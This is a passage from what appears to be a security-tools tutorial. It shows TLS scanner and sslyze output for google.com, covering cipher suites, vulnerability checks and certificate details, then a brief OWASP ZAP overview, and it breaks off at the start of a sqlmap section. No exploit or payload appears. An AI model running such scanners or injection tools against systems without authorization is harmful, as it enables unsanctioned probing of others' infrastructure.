ECDHE-RSA-AES128-SHA Curve 25519 DHE 253 Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve 25519 DHE 253 Accepted TLSv1.1 128 bits AES128-SHA Accepted TLSv1.1 256 bits AES256-SHA Accepted TLSv1.1 112 bits DES-CBC3-SHA Preferred TLSv1.0 128 bits ECDHE-ECDSA-AES128-SHA Curve 25519 DHE 253 Accepted TLSv1.0 256 bits ECDHE-ECDSA-AES256-SHA Curve 25519 DHE 253 Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve 25519 DHE 253 Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve 25519 DHE 253 Accepted TLSv1.0 128 bits AES128-SHA Accepted TLSv1.0 256 bits AES256-SHA Accepted TLSv1.0 112 bits DES-CBC3-SHA Server Key Exchange Group<span class="o">(</span>s<span class="o">)</span>: TLSv1.3 128 bits secp256r1 <span class="o">(</span>NIST P-256<span class="o">)</span> TLSv1.3 128 bits x25519 TLSv1.2 128 bits secp256r1 <span class="o">(</span>NIST P-256<span class="o">)</span> TLSv1.2 128 bits x25519 SSL Certificate: Signature Algorithm: sha256WithRSAEncryption ECC Curve Name: prime256v1 ECC Key Strength: 128 Subject: <span class="k">*</span>.google.com Altnames: DNS:<span class="k">*</span>.google.com, DNS:<span class="k">*</span>.appengine.google.com, DNS:<span class="k">*</span>.bdn.dev, DNS:<span class="k">*</span>.origin-test.bdn.dev, DNS:<span class="k">*</span>.cloud.google.com, DNS:<span class="k">*</span>.crowdsource.google.com, DNS:<span class="k">*</span>.datacompute.google.com, DNS:<span class="k">*</span>.google.ca, DNS:<span class="k">*</span>.google.cl, DNS:<span class="k">*</span>.google.co.in, DNS:<span class="k">*</span>.google.co.jp, DNS:<span class="k">*</span>.google.co.uk, DNS:<span class="k">*</span>.google.com.ar, DNS:<span class="k">*</span>.google.com.au, DNS:<span class="k">*</span>.google.com.br, DNS:<span class="k">*</span>.google.com.co, DNS:<span class="k">*</span>.google.com.mx, DNS:<span class="k">*</span>.google.com.tr, DNS:<span class="k">*</span>.google.com.vn, DNS:<span class="k">*</span>.google.de, DNS:<span class="k">*</span>.google.es, DNS:<span class="k">*</span>.google.fr, DNS:<span class="k">*</span>.google.hu, DNS:<span class="k">*</span>.google.it, DNS:<span class="k">*</span>.google.nl, DNS:<span class="k">*</span>.google.pl, DNS:<span class="k">*</span>.google.pt, DNS:<span class="k">*</span>.googleapis.cn, DNS:<span class="k">*</span>.googlevideo.com, DNS:<span class="k">*</span>.gstatic.cn, DNS:<span class="k">*</span>.gstatic-cn.com, DNS:googlecnapps.cn, DNS:<span class="k">*</span>.googlecnapps.cn, DNS:googleapps-cn.com, DNS:<span class="k">*</span>.googleapps-cn.com, DNS:gkecnapps.cn, DNS:<span class="k">*</span>.gkecnapps.cn, DNS:googledownloads.cn, DNS:<span class="k">*</span>.googledownloads.cn, DNS:recaptcha.net.cn, DNS:<span class="k">*</span>.recaptcha.net.cn, DNS:recaptcha-cn.net, DNS:<span class="k">*</span>.recaptcha-cn.net, DNS:widevine.cn, DNS:<span class="k">*</span>.widevine.cn, DNS:ampproject.org.cn, DNS:<span class="k">*</span>.ampproject.org.cn, DNS:ampproject.net.cn, DNS:<span class="k">*</span>.ampproject.net.cn, DNS:google-analytics-cn.com, DNS:<span class="k">*</span>.google-analytics-cn.com, DNS:googleadservices-cn.com, DNS:<span class="k">*</span>.googleadservices-cn.com, DNS:googlevads-cn.com, DNS:<span class="k">*</span>.googlevads-cn.com, DNS:googleapis-cn.com, DNS:<span class="k">*</span>.googleapis-cn.com, DNS:googleoptimize-cn.com, DNS:<span class="k">*</span>.googleoptimize-cn.com, DNS:doubleclick-cn.net, DNS:<span class="k">*</span>.doubleclick-cn.net, DNS:<span class="k">*</span>.fls.doubleclick-cn.net, DNS:<span class="k">*</span>.g.doubleclick-cn.net, DNS:doubleclick.cn, DNS:<span class="k">*</span>.doubleclick.cn, DNS:<span class="k">*</span>.fls.doubleclick.cn, DNS:<span class="k">*</span>.g.doubleclick.cn, DNS:dartsearch-cn.net, DNS:<span class="k">*</span>.dartsearch-cn.net, DNS:googletraveladservices-cn.com, DNS:<span class="k">*</span>.googletraveladservices-cn.com, DNS:googletagservices-cn.com, DNS:<span class="k">*</span>.googletagservices-cn.com, DNS:googletagmanager-cn.com, DNS:<span class="k">*</span>.googletagmanager-cn.com, DNS:googlesyndication-cn.com, DNS:<span class="k">*</span>.googlesyndication-cn.com, DNS:<span class="k">*</span>.safeframe.googlesyndication-cn.com, DNS:app-measurement-cn.com, DNS:<span class="k">*</span>.app-measurement-cn.com, DNS:gvt1-cn.com, DNS:<span class="k">*</span>.gvt1-cn.com, DNS:gvt2-cn.com, DNS:<span class="k">*</span>.gvt2-cn.com, DNS:2mdn-cn.net, DNS:<span class="k">*</span>.2mdn-cn.net, DNS:googleflights-cn.net, DNS:<span class="k">*</span>.googleflights-cn.net, DNS:admob-cn.com, DNS:<span class="k">*</span>.admob-cn.com, DNS:googlesandbox-cn.com, DNS:<span class="k">*</span>.googlesandbox-cn.com, DNS:<span class="k">*</span>.safenup.googlesandbox-cn.com, DNS:<span class="k">*</span>.gstatic.com, DNS:<span class="k">*</span>.metric.gstatic.com, DNS:<span class="k">*</span>.gvt1.com, DNS:<span class="k">*</span>.gcpcdn.gvt1.com, DNS:<span class="k">*</span>.gvt2.com, DNS:<span class="k">*</span>.gcp.gvt2.com, DNS:<span class="k">*</span>.url.google.com, DNS:<span class="k">*</span>.youtube-nocookie.com, DNS:<span class="k">*</span>.ytimg.com, DNS:android.com, DNS:<span class="k">*</span>.android.com, DNS:<span class="k">*</span>.flash.android.com, DNS:g.cn, DNS:<span class="k">*</span>.g.cn, DNS:g.co, DNS:<span class="k">*</span>.g.co, DNS:goo.gl, DNS:www.goo.gl, DNS:google-analytics.com, DNS:<span class="k">*</span>.google-analytics.com, DNS:google.com, DNS:googlecommerce.com, DNS:<span class="k">*</span>.googlecommerce.com, DNS:ggpht.cn, DNS:<span class="k">*</span>.ggpht.cn, DNS:urchin.com, DNS:<span class="k">*</span>.urchin.com, DNS:youtu.be, DNS:youtube.com, DNS:<span class="k">*</span>.youtube.com, DNS:music.youtube.com, DNS:<span class="k">*</span>.music.youtube.com, DNS:youtubeeducation.com, DNS:<span class="k">*</span>.youtubeeducation.com, DNS:youtubekids.com, DNS:<span class="k">*</span>.youtubekids.com, DNS:yt.be, DNS:<span class="k">*</span>.yt.be, DNS:android.clients.google.com, DNS:<span class="k">*</span>.android.google.cn, DNS:<span class="k">*</span>.chrome.google.cn, DNS:<span class="k">*</span>.developers.google.cn Issuer: WR2 Not valid before: Aug 12 06:33:49 2024 GMT Not valid after: Nov 4 06:33:48 2024 GMT </code></pre> </div> <h1> 3. Sslyze </h1> <p>Terminal<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>sslyze google.com <span class="nt">--regular</span> </code></pre> </div> <p>OUTPUT<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> CHECKING HOST<span class="o">(</span>S<span class="o">)</span> AVAILABILITY <span class="nt">-----------------------------</span> google.com:443 <span class="o">=&gt;</span> 142.251.135.110 SCAN RESULTS FOR GOOGLE.COM:443 - 142.251.135.110 <span class="nt">-------------------------------------------------</span> <span class="k">*</span> SSL 2.0 Cipher Suites: Attempted to connect using 7 cipher suites<span class="p">;</span> the server rejected all cipher suites. <span class="k">*</span> OpenSSL Heartbleed: OK - Not vulnerable to Heartbleed <span class="k">*</span> TLS 1.0 Cipher Suites: Attempted to connect using 80 cipher suites. The server accepted the following 5 cipher suites: TLS_RSA_WITH_AES_256_CBC_SHA 256 TLS_RSA_WITH_AES_128_CBC_SHA 128 TLS_RSA_WITH_3DES_EDE_CBC_SHA 168 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 ECDH: prime256v1 <span class="o">(</span>256 bits<span class="o">)</span> TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 ECDH: prime256v1 <span class="o">(</span>256 bits<span class="o">)</span> The group of cipher suites supported by the server has the following properties: Forward Secrecy OK - Supported Legacy RC4 Algorithm OK - Not Supported <span class="k">*</span> Deflate Compression: OK - Compression disabled <span class="k">*</span> Elliptic Curve Key Exchange: Supported curves: X25519, prime256v1 Rejected curves: X448, prime192v1, secp160k1, secp160r1, secp160r2, secp192k1, secp224k1, secp224r1, secp256k1, secp384r1, secp521r1, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1 <span class="k">*</span> TLS 1.1 Cipher Suites: Attempted to connect using 80 cipher suites. The server accepted the following 5 cipher suites: TLS_RSA_WITH_AES_256_CBC_SHA 256 TLS_RSA_WITH_AES_128_CBC_SHA 128 TLS_RSA_WITH_3DES_EDE_CBC_SHA 168 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 ECDH: prime256v1 <span class="o">(</span>256 bits<span class="o">)</span> TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 ECDH: prime256v1 <span class="o">(</span>256 bits<span class="o">)</span> The group of cipher suites supported by the server has the following properties: Forward Secrecy OK - Supported Legacy RC4 Algorithm OK - Not Supported <span class="k">*</span> Downgrade Attacks: TLS_FALLBACK_SCSV: OK - Supported <span class="k">*</span> TLS 1.2 Cipher Suites: Attempted to connect using 156 cipher suites. The server accepted the following 11 cipher suites: TLS_RSA_WITH_AES_256_GCM_SHA384 256 TLS_RSA_WITH_AES_256_CBC_SHA 256 TLS_RSA_WITH_AES_128_GCM_SHA256 128 TLS_RSA_WITH_AES_128_CBC_SHA 128 TLS_RSA_WITH_3DES_EDE_CBC_SHA 168 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 256 ECDH: X25519 <span class="o">(</span>253 bits<span class="o">)</span> TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 ECDH: prime256v1 <span class="o">(</span>256 bits<span class="o">)</span> TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 ECDH: prime256v1 <span class="o">(</span>256 bits<span class="o">)</span> TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 ECDH: prime256v1 <span class="o">(</span>256 bits<span class="o">)</span> TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 ECDH: prime256v1 <span class="o">(</span>256 bits<span class="o">)</span> TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 256 ECDH: X25519 <span class="o">(</span>253 bits<span class="o">)</span> The group of cipher suites supported by the server has the following properties: Forward Secrecy OK - Supported Legacy RC4 Algorithm OK - Not Supported <span class="k">*</span> OpenSSL CCS Injection: OK - Not vulnerable to OpenSSL CCS injection <span class="k">*</span> Session Renegotiation: Client Renegotiation DoS Attack: OK - Not vulnerable Secure Renegotiation: OK - Supported <span class="k">*</span> Certificates Information: Hostname sent <span class="k">for </span>SNI: google.com Number of certificates detected: 2 Certificate <span class="c">#0 ( _RSAPublicKey )</span> SHA1 Fingerprint: b3aa4649c2c335ece22bb517663e5fb55d8e7ea7 Common Name: <span class="k">*</span>.google.com Issuer: WR2 Serial Number: 304939306852206029209973686766662546304 Not Before: 2024-08-12 Not After: 2024-11-04 Public Key Algorithm: _RSAPublicKey Signature Algorithm: sha256 Key Size: 2048 Exponent: 65537 DNS Subject Alternative Names: <span class="o">[</span><span class="s1">'*.google.com'</span>, <span class="s1">'*.appengine.google.com'</span>, <span class="s1">'*.bdn.dev'</span>, <span class="s1">'*.origin-test.bdn.dev'</span>, <span class="s1">'*.cloud.google.com'</span>, <span class="s1">'*.crowdsource.google.com'</span>, <span class="s1">'*.datacompute.google.com'</span>, <span class="s1">'*.google.ca'</span>, <span class="s1">'*.google.cl'</span>, <span class="s1">'*.google.co.in'</span>, <span class="s1">'*.google.co.jp'</span>, <span class="s1">'*.google.co.uk'</span>, <span class="s1">'*.google.com.ar'</span>, <span class="s1">'*.google.com.au'</span>, <span class="s1">'*.google.com.br'</span>, <span class="s1">'*.google.com.co'</span>, <span class="s1">'*.google.com.mx'</span>, <span class="s1">'*.google.com.tr'</span>, <span class="s1">'*.google.com.vn'</span>, <span class="s1">'*.google.de'</span>, <span class="s1">'*.google.es'</span>, <span class="s1">'*.google.fr'</span>, <span class="s1">'*.google.hu'</span>, <span class="s1">'*.google.it'</span>, <span class="s1">'*.google.nl'</span>, <span class="s1">'*.google.pl'</span>, <span class="s1">'*.google.pt'</span>, <span class="s1">'*.googleapis.cn'</span>, <span class="s1">'*.googlevideo.com'</span>, <span class="s1">'*.gstatic.cn'</span>, <span class="s1">'*.gstatic-cn.com'</span>, <span class="s1">'googlecnapps.cn'</span>, <span class="s1">'*.googlecnapps.cn'</span>, <span class="s1">'googleapps-cn.com'</span>, <span class="s1">'*.googleapps-cn.com'</span>, <span class="s1">'gkecnapps.cn'</span>, <span class="s1">'*.gkecnapps.cn'</span>, <span class="s1">'googledownloads.cn'</span>, <span class="s1">'*.googledownloads.cn'</span>, <span class="s1">'recaptcha.net.cn'</span>, <span class="s1">'*.recaptcha.net.cn'</span>, <span class="s1">'recaptcha-cn.net'</span>, <span class="s1">'*.recaptcha-cn.net'</span>, <span class="s1">'widevine.cn'</span>, <span class="s1">'*.widevine.cn'</span>, <span class="s1">'ampproject.org.cn'</span>, <span class="s1">'*.ampproject.org.cn'</span>, <span class="s1">'ampproject.net.cn'</span>, <span class="s1">'*.ampproject.net.cn'</span>, <span class="s1">'google-analytics-cn.com'</span>, <span class="s1">'*.google-analytics-cn.com'</span>, <span class="s1">'googleadservices-cn.com'</span>, <span class="s1">'*.googleadservices-cn.com'</span>, <span class="s1">'googlevads-cn.com'</span>, <span class="s1">'*.googlevads-cn.com'</span>, <span class="s1">'googleapis-cn.com'</span>, <span class="s1">'*.googleapis-cn.com'</span>, <span class="s1">'googleoptimize-cn.com'</span>, <span class="s1">'*.googleoptimize-cn.com'</span>, <span class="s1">'doubleclick-cn.net'</span>, <span class="s1">'*.doubleclick-cn.net'</span>, <span class="s1">'*.fls.doubleclick-cn.net'</span>, <span class="s1">'*.g.doubleclick-cn.net'</span>, <span class="s1">'doubleclick.cn'</span>, <span class="s1">'*.doubleclick.cn'</span>, <span class="s1">'*.fls.doubleclick.cn'</span>, <span class="s1">'*.g.doubleclick.cn'</span>, <span class="s1">'dartsearch-cn.net'</span>, <span class="s1">'*.dartsearch-cn.net'</span>, <span class="s1">'googletraveladservices-cn.com'</span>, <span class="s1">'*.googletraveladservices-cn.com'</span>, <span class="s1">'googletagservices-cn.com'</span>, <span class="s1">'*.googletagservices-cn.com'</span>, <span class="s1">'googletagmanager-cn.com'</span>, <span class="s1">'*.googletagmanager-cn.com'</span>, <span class="s1">'googlesyndication-cn.com'</span>, <span class="s1">'*.googlesyndication-cn.com'</span>, <span class="s1">'*.safeframe.googlesyndication-cn.com'</span>, <span class="s1">'app-measurement-cn.com'</span>, <span class="s1">'*.app-measurement-cn.com'</span>, <span class="s1">'gvt1-cn.com'</span>, <span class="s1">'*.gvt1-cn.com'</span>, <span class="s1">'gvt2-cn.com'</span>, <span class="s1">'*.gvt2-cn.com'</span>, <span class="s1">'2mdn-cn.net'</span>, <span class="s1">'*.2mdn-cn.net'</span>, <span class="s1">'googleflights-cn.net'</span>, <span class="s1">'*.googleflights-cn.net'</span>, <span class="s1">'admob-cn.com'</span>, <span class="s1">'*.admob-cn.com'</span>, <span class="s1">'googlesandbox-cn.com'</span>, <span class="s1">'*.googlesandbox-cn.com'</span>, <span class="s1">'*.safenup.googlesandbox-cn.com'</span>, <span class="s1">'*.gstatic.com'</span>, <span class="s1">'*.metric.gstatic.com'</span>, <span class="s1">'*.gvt1.com'</span>, <span class="s1">'*.gcpcdn.gvt1.com'</span>, <span class="s1">'*.gvt2.com'</span>, <span class="s1">'*.gcp.gvt2.com'</span>, <span class="s1">'*.url.google.com'</span>, <span class="s1">'*.youtube-nocookie.com'</span>, <span class="s1">'*.ytimg.com'</span>, <span class="s1">'android.com'</span>, <span class="s1">'*.android.com'</span>, <span class="s1">'*.flash.android.com'</span>, <span class="s1">'g.cn'</span>, <span class="s1">'*.g.cn'</span>, <span class="s1">'g.co'</span>, <span class="s1">'*.g.co'</span>, <span class="s1">'goo.gl'</span>, <span class="s1">'www.goo.gl'</span>, <span class="s1">'google-analytics.com'</span>, <span class="s1">'*.google-analytics.com'</span>, <span class="s1">'google.com'</span>, <span class="s1">'googlecommerce.com'</span>, <span class="s1">'*.googlecommerce.com'</span>, <span class="s1">'ggpht.cn'</span>, <span class="s1">'*.ggpht.cn'</span>, <span class="s1">'urchin.com'</span>, <span class="s1">'*.urchin.com'</span>, <span class="s1">'youtu.be'</span>, <span class="s1">'youtube.com'</span>, <span class="s1">'*.youtube.com'</span>, <span class="s1">'music.youtube.com'</span>, <span class="s1">'*.music.youtube.com'</span>, <span class="s1">'youtubeeducation.com'</span>, <span class="s1">'*.youtubeeducation.com'</span>, <span class="s1">'youtubekids.com'</span>, <span class="s1">'*.youtubekids.com'</span>, <span class="s1">'yt.be'</span>, <span class="s1">'*.yt.be'</span>, <span class="s1">'android.clients.google.com'</span>, <span class="s1">'*.android.google.cn'</span>, <span class="s1">'*.chrome.google.cn'</span>, <span class="s1">'*.developers.google.cn'</span><span class="o">]</span> Certificate <span class="c">#0 - Trust</span> Hostname Validation: OK - Certificate matches server <span class="nb">hostname </span>Android CA Store <span class="o">(</span>9.0.0_r9<span class="o">)</span>: OK - Certificate is trusted Apple CA Store <span class="o">(</span>iOS 14, iPadOS 14, macOS 11, watchOS 7, and tvOS 14<span class="o">)</span>:OK - Certificate is trusted Java CA Store <span class="o">(</span>jdk-13.0.2<span class="o">)</span>: OK - Certificate is trusted Mozilla CA Store <span class="o">(</span>2021-01-24<span class="o">)</span>: OK - Certificate is trusted Windows CA Store <span class="o">(</span>2021-02-08<span class="o">)</span>: OK - Certificate is trusted Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate Received Chain: <span class="k">*</span>.google.com <span class="nt">--</span><span class="o">&gt;</span> WR2 <span class="nt">--</span><span class="o">&gt;</span> GTS Root R1 Verified Chain: <span class="k">*</span>.google.com <span class="nt">--</span><span class="o">&gt;</span> WR2 <span class="nt">--</span><span class="o">&gt;</span> GTS Root R1 <span class="nt">--</span><span class="o">&gt;</span> GlobalSign Root CA Received Chain Contains Anchor: OK - Anchor certificate not sent Received Chain Order: OK - Order is valid Verified Chain contains SHA1: OK - No SHA1-signed certificate <span class="k">in </span>the verified certificate chain Certificate <span class="c">#0 - Extensions</span> OCSP Must-Staple: NOT SUPPORTED - Extension not found Certificate Transparency: WARNING - Only 2 SCTs included but Google recommends 3 or more Certificate <span class="c">#0 - OCSP Stapling</span> NOT SUPPORTED - Server did not send back an OCSP response Certificate <span class="c">#1 ( _EllipticCurvePublicKey )</span> SHA1 Fingerprint: 9772b050d3115af7a43e14439b9bda054440581c Common Name: <span class="k">*</span>.google.com Issuer: WR2 Serial Number: 93367997912792567694462855265825644234 Not Before: 2024-08-12 Not After: 2024-11-04 Public Key Algorithm: _EllipticCurvePublicKey Signature Algorithm: sha256 Key Size: 256 Curve: secp256r1 DNS Subject Alternative Names: <span class="o">[</span><span class="s1">'*.google.com'</span>, <span class="s1">'*.appengine.google.com'</span>, <span class="s1">'*.bdn.dev'</span>, <span class="s1">'*.origin-test.bdn.dev'</span>, <span class="s1">'*.cloud.google.com'</span>, <span class="s1">'*.crowdsource.google.com'</span>, <span class="s1">'*.datacompute.google.com'</span>, <span class="s1">'*.google.ca'</span>, <span class="s1">'*.google.cl'</span>, <span class="s1">'*.google.co.in'</span>, <span class="s1">'*.google.co.jp'</span>, <span class="s1">'*.google.co.uk'</span>, <span class="s1">'*.google.com.ar'</span>, <span class="s1">'*.google.com.au'</span>, <span class="s1">'*.google.com.br'</span>, <span class="s1">'*.google.com.co'</span>, <span class="s1">'*.google.com.mx'</span>, <span class="s1">'*.google.com.tr'</span>, <span class="s1">'*.google.com.vn'</span>, <span class="s1">'*.google.de'</span>, <span class="s1">'*.google.es'</span>, <span class="s1">'*.google.fr'</span>, <span class="s1">'*.google.hu'</span>, <span class="s1">'*.google.it'</span>, <span class="s1">'*.google.nl'</span>, <span class="s1">'*.google.pl'</span>, <span class="s1">'*.google.pt'</span>, <span class="s1">'*.googleapis.cn'</span>, <span class="s1">'*.googlevideo.com'</span>, <span class="s1">'*.gstatic.cn'</span>, <span class="s1">'*.gstatic-cn.com'</span>, <span class="s1">'googlecnapps.cn'</span>, <span class="s1">'*.googlecnapps.cn'</span>, <span class="s1">'googleapps-cn.com'</span>, <span class="s1">'*.googleapps-cn.com'</span>, <span class="s1">'gkecnapps.cn'</span>, <span class="s1">'*.gkecnapps.cn'</span>, <span class="s1">'googledownloads.cn'</span>, <span class="s1">'*.googledownloads.cn'</span>, <span class="s1">'recaptcha.net.cn'</span>, <span class="s1">'*.recaptcha.net.cn'</span>, <span class="s1">'recaptcha-cn.net'</span>, <span class="s1">'*.recaptcha-cn.net'</span>, <span class="s1">'widevine.cn'</span>, <span class="s1">'*.widevine.cn'</span>, <span class="s1">'ampproject.org.cn'</span>, <span class="s1">'*.ampproject.org.cn'</span>, <span class="s1">'ampproject.net.cn'</span>, <span class="s1">'*.ampproject.net.cn'</span>, <span class="s1">'google-analytics-cn.com'</span>, <span class="s1">'*.google-analytics-cn.com'</span>, <span class="s1">'googleadservices-cn.com'</span>, <span class="s1">'*.googleadservices-cn.com'</span>, <span class="s1">'googlevads-cn.com'</span>, <span class="s1">'*.googlevads-cn.com'</span>, <span class="s1">'googleapis-cn.com'</span>, <span class="s1">'*.googleapis-cn.com'</span>, <span class="s1">'googleoptimize-cn.com'</span>, <span class="s1">'*.googleoptimize-cn.com'</span>, <span class="s1">'doubleclick-cn.net'</span>, <span class="s1">'*.doubleclick-cn.net'</span>, <span class="s1">'*.fls.doubleclick-cn.net'</span>, <span class="s1">'*.g.doubleclick-cn.net'</span>, <span class="s1">'doubleclick.cn'</span>, <span class="s1">'*.doubleclick.cn'</span>, <span class="s1">'*.fls.doubleclick.cn'</span>, <span class="s1">'*.g.doubleclick.cn'</span>, <span class="s1">'dartsearch-cn.net'</span>, <span class="s1">'*.dartsearch-cn.net'</span>, <span class="s1">'googletraveladservices-cn.com'</span>, <span class="s1">'*.googletraveladservices-cn.com'</span>, <span class="s1">'googletagservices-cn.com'</span>, <span class="s1">'*.googletagservices-cn.com'</span>, <span class="s1">'googletagmanager-cn.com'</span>, <span class="s1">'*.googletagmanager-cn.com'</span>, <span class="s1">'googlesyndication-cn.com'</span>, <span class="s1">'*.googlesyndication-cn.com'</span>, <span class="s1">'*.safeframe.googlesyndication-cn.com'</span>, <span class="s1">'app-measurement-cn.com'</span>, <span class="s1">'*.app-measurement-cn.com'</span>, <span class="s1">'gvt1-cn.com'</span>, <span class="s1">'*.gvt1-cn.com'</span>, <span class="s1">'gvt2-cn.com'</span>, <span class="s1">'*.gvt2-cn.com'</span>, <span class="s1">'2mdn-cn.net'</span>, <span class="s1">'*.2mdn-cn.net'</span>, <span class="s1">'googleflights-cn.net'</span>, <span class="s1">'*.googleflights-cn.net'</span>, <span class="s1">'admob-cn.com'</span>, <span class="s1">'*.admob-cn.com'</span>, <span class="s1">'googlesandbox-cn.com'</span>, <span class="s1">'*.googlesandbox-cn.com'</span>, <span class="s1">'*.safenup.googlesandbox-cn.com'</span>, <span class="s1">'*.gstatic.com'</span>, <span class="s1">'*.metric.gstatic.com'</span>, <span class="s1">'*.gvt1.com'</span>, <span class="s1">'*.gcpcdn.gvt1.com'</span>, <span class="s1">'*.gvt2.com'</span>, <span class="s1">'*.gcp.gvt2.com'</span>, <span class="s1">'*.url.google.com'</span>, <span class="s1">'*.youtube-nocookie.com'</span>, <span class="s1">'*.ytimg.com'</span>, <span class="s1">'android.com'</span>, <span class="s1">'*.android.com'</span>, <span class="s1">'*.flash.android.com'</span>, <span class="s1">'g.cn'</span>, <span class="s1">'*.g.cn'</span>, <span class="s1">'g.co'</span>, <span class="s1">'*.g.co'</span>, <span class="s1">'goo.gl'</span>, <span class="s1">'www.goo.gl'</span>, <span class="s1">'google-analytics.com'</span>, <span class="s1">'*.google-analytics.com'</span>, <span class="s1">'google.com'</span>, <span class="s1">'googlecommerce.com'</span>, <span class="s1">'*.googlecommerce.com'</span>, <span class="s1">'ggpht.cn'</span>, <span class="s1">'*.ggpht.cn'</span>, <span class="s1">'urchin.com'</span>, <span class="s1">'*.urchin.com'</span>, <span class="s1">'youtu.be'</span>, <span class="s1">'youtube.com'</span>, <span class="s1">'*.youtube.com'</span>, <span class="s1">'music.youtube.com'</span>, <span class="s1">'*.music.youtube.com'</span>, <span class="s1">'youtubeeducation.com'</span>, <span class="s1">'*.youtubeeducation.com'</span>, <span class="s1">'youtubekids.com'</span>, <span class="s1">'*.youtubekids.com'</span>, <span class="s1">'yt.be'</span>, <span class="s1">'*.yt.be'</span>, <span class="s1">'android.clients.google.com'</span>, <span class="s1">'*.android.google.cn'</span>, <span class="s1">'*.chrome.google.cn'</span>, <span class="s1">'*.developers.google.cn'</span><span class="o">]</span> Certificate <span class="c">#1 - Trust</span> Hostname Validation: OK - Certificate matches server <span class="nb">hostname </span>Android CA Store <span class="o">(</span>9.0.0_r9<span class="o">)</span>: OK - Certificate is trusted Apple CA Store <span class="o">(</span>iOS 14, iPadOS 14, macOS 11, watchOS 7, and tvOS 14<span class="o">)</span>:OK - Certificate is trusted Java CA Store <span class="o">(</span>jdk-13.0.2<span class="o">)</span>: OK - Certificate is trusted Mozilla CA Store <span class="o">(</span>2021-01-24<span class="o">)</span>: OK - Certificate is trusted Windows CA Store <span class="o">(</span>2021-02-08<span class="o">)</span>: OK - Certificate is trusted Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate Received Chain: <span class="k">*</span>.google.com <span class="nt">--</span><span class="o">&gt;</span> WR2 <span class="nt">--</span><span class="o">&gt;</span> GTS Root R1 Verified Chain: <span class="k">*</span>.google.com <span class="nt">--</span><span class="o">&gt;</span> WR2 <span class="nt">--</span><span class="o">&gt;</span> GTS Root R1 <span class="nt">--</span><span class="o">&gt;</span> GlobalSign Root CA Received Chain Contains Anchor: OK - Anchor certificate not sent Received Chain Order: OK - Order is valid Verified Chain contains SHA1: OK - No SHA1-signed certificate <span class="k">in </span>the verified certificate chain Certificate <span class="c">#1 - Extensions</span> OCSP Must-Staple: NOT SUPPORTED - Extension not found Certificate Transparency: WARNING - Only 2 SCTs included but Google recommends 3 or more Certificate <span class="c">#1 - OCSP Stapling</span> NOT SUPPORTED - Server did not send back an OCSP response <span class="k">*</span> SSL 3.0 Cipher Suites: Attempted to connect using 80 cipher suites<span class="p">;</span> the server rejected all cipher suites. <span class="k">*</span> ROBOT Attack: OK - Not vulnerable. <span class="k">*</span> TLS 1.3 Cipher Suites: Attempted to connect using 5 cipher suites. The server accepted the following 3 cipher suites: TLS_CHACHA20_POLY1305_SHA256 256 ECDH: X25519 <span class="o">(</span>253 bits<span class="o">)</span> TLS_AES_256_GCM_SHA384 256 ECDH: X25519 <span class="o">(</span>253 bits<span class="o">)</span> TLS_AES_128_GCM_SHA256 128 ECDH: X25519 <span class="o">(</span>253 bits<span class="o">)</span> <span class="k">*</span> Connection timed out <span class="k">for</span> <span class="nt">--resum</span>: try using <span class="nt">--slow_connection</span> to reduce the impact on the server. SCAN COMPLETED IN 77.19 S <span class="nt">-------------------------</span> </code></pre> </div> <h1> 4. OWASP Zed Attack Proxy(ZAP) </h1> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9w82epbomt7prfd756ax.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9w82epbomt7prfd756ax.png" alt=" " width="800" height="419"></a><br> Goto navigator<br> <a href="http://localhost:8080/" rel="noopener noreferrer">http://localhost:8080/</a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgvd07fuqj5fj6fswhsus.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgvd07fuqj5fj6fswhsus.png" alt=" " width="800" height="485"></a></p> <h3> UI ZAP API </h3> <p>Composants</p> <ul> <li>acsrf </li> <li>ajaxSpider </li> <li>alert </li> <li>alertFilter </li> <li>ascan </li> <li>authentication </li> <li>authorization </li> <li>autoupdate </li> <li>break </li> <li>context </li> <li>core </li> <li>forcedUser </li> <li>graphql </li> <li>httpSessions </li> <li>hud </li> <li>hudfiles </li> <li>importurls </li> <li>keyboard </li> <li>localProxies </li> <li>openapi </li> <li>params </li> <li>pscan </li> <li>quickstartlaunch </li> <li>replacer </li> <li>reveal </li> <li>ruleConfig </li> <li>script </li> <li>search </li> <li>selenium </li> <li>sessionManagement </li> <li>soap </li> <li>spider </li> <li>stats </li> <li>users </li> <li>websocket</li> </ul> <h1> 5. Sqlmap </h1> <p>Terminal<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>sqlmap </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code> ___ __H__ ___ ___[<span 